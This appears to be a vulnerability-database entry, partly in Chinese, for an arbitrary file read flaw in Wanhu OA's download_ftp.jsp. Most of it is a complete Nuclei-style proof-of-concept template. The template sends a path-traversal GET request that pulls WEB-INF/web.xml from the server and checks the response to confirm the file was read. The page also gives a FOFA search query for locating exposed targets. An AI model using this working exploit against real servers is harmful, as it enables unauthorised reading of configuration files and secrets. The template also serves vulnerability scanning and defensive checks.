wanhu-download-ftp-file-read: Wanhu OA download_ftp.jsp - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Wanhu OA | POC: 已公开

漏洞描述

There is an arbitrary file download vulnerability in the Wanhu OA download_ftp.jsp file. An attacker can download any file on the server through the vulnerability.

PoC代码[已公开]

id: wanhu-download-ftp-file-read

info:
  name: Wanhu OA download_ftp.jsp - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file download vulnerability in the Wanhu OA download_ftp.jsp file. An attacker can download any file on the server through the vulnerability.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_ftp.jsp%20任意文件下载漏洞.html
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/wanhu-oa-download-ftp-file-read.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="万户网络-ezOFFICE"
  tags: wanhu,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<?xml version="
          - "web-app"
          - "display-name"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022050e4ab9ae7c0743dc93a23535bf56f2d7947f34a1820e1d83eaef7cf92272582022100eaccafcce6c3da8e51c7d382c7bfc9fa8789534e40ac832553566caf19c7911f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐